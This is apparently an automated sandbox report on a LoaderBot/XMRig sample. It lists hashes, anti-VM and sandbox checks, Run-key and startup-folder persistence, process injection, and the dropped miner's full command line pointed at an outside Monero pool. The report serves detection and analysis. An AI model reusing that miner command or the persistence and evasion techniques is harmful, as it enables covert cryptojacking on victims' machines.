Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
18/03/2025, 12:11
Static task
static1
Behavioral task
behavioral1
Sample
dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe
Resource
win10v2004-20250314-en
General
-
Target
dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe
-
Size
1.7MB
-
MD5
7026ed6db478e504b8a3bcc554c32a87
-
SHA1
1951ab06af8da8f2b0c33f7b221b0cb95d33250a
-
SHA256
dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e
-
SHA512
ad5fbf1d6aeb823bee4cdb0245579e98dfad23ef886c69840da73e5b8ed5636975e0ddb16004d335397f3d234ec33ec1e7de111d41294c1b46d58f3e5154d48d
-
SSDEEP
24576:pilxhO8efwEYKcCXP+IrOOVjiSM39ey/XBPtkr//G5JGU6Nz/MdZOPSlL:UlU+KX+eOGjeYYxPtk/syEoPSl
Malware Config
Signatures
-
Loaderbot family
-
Xmrig family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ AudioDriver.exe -
XMRig Miner payload 15 IoCs
resource yara_rule behavioral2/memory/3592-16-0x0000000000750000-0x00000000009A4000-memory.dmp xmrig behavioral2/memory/3592-17-0x0000000000750000-0x00000000009A4000-memory.dmp xmrig behavioral2/memory/3592-19-0x0000000000750000-0x00000000009A4000-memory.dmp xmrig behavioral2/memory/3592-21-0x0000000000750000-0x00000000009A4000-memory.dmp xmrig behavioral2/memory/3592-23-0x0000000000750000-0x00000000009A4000-memory.dmp xmrig behavioral2/memory/3592-25-0x0000000000750000-0x00000000009A4000-memory.dmp xmrig behavioral2/memory/3592-27-0x0000000000750000-0x00000000009A4000-memory.dmp xmrig behavioral2/memory/3592-29-0x0000000000750000-0x00000000009A4000-memory.dmp xmrig behavioral2/memory/3592-31-0x0000000000750000-0x00000000009A4000-memory.dmp xmrig behavioral2/memory/3592-33-0x0000000000750000-0x00000000009A4000-memory.dmp xmrig behavioral2/memory/3592-35-0x0000000000750000-0x00000000009A4000-memory.dmp xmrig behavioral2/memory/3592-37-0x0000000000750000-0x00000000009A4000-memory.dmp xmrig behavioral2/memory/3592-39-0x0000000000750000-0x00000000009A4000-memory.dmp xmrig behavioral2/memory/3592-41-0x0000000000750000-0x00000000009A4000-memory.dmp xmrig behavioral2/memory/3592-43-0x0000000000750000-0x00000000009A4000-memory.dmp xmrig -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion AudioDriver.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion AudioDriver.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe -
Cryptocurrency Miner
Makes network request to known mining pool URL.
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioDriver.url dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe -
Executes dropped EXE 1 IoCs
pid Process 3592 AudioDriver.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine AudioDriver.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AudioDriver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe" dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 3 iplogger.com 5 iplogger.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3592 AudioDriver.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AudioDriver.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 3592 AudioDriver.exe 3592 AudioDriver.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe Token: SeLockMemoryPrivilege 3592 AudioDriver.exe Token: SeLockMemoryPrivilege 3592 AudioDriver.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1276 wrote to memory of 3592 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 89 PID 1276 wrote to memory of 3592 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 89 PID 1276 wrote to memory of 3592 1276 dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe"C:\Users\Admin\AppData\Local\Temp\dc685713843da5bfcbfcc289456d2d9430cbdff9108a8d01b4759728cc5d813e.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Drops startup file
- Identifies Wine through registry keys
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Users\Admin\AppData\Roaming\Sysfiles\AudioDriver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\AudioDriver.exe" -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x -k -v=0 --donate-level=1 -t 42⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3592
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
993KB
MD5fcf91e6d9c61aa6c79383e7a289425b1
SHA1cf3b35cbe43bb77681fc540af33a675f673791e6
SHA2560da86353137c5ffaa4d54831f43e01d9a678337ffe0e365164a7e2e6418ac185
SHA51232b0d48c0add2323f8be4b71a59c541d27910c99d2864a020f40290d722b4c495f30fef0e38a2a5494360d12de423b1cf46f003849b0821f0c2df2a94ba0e9d4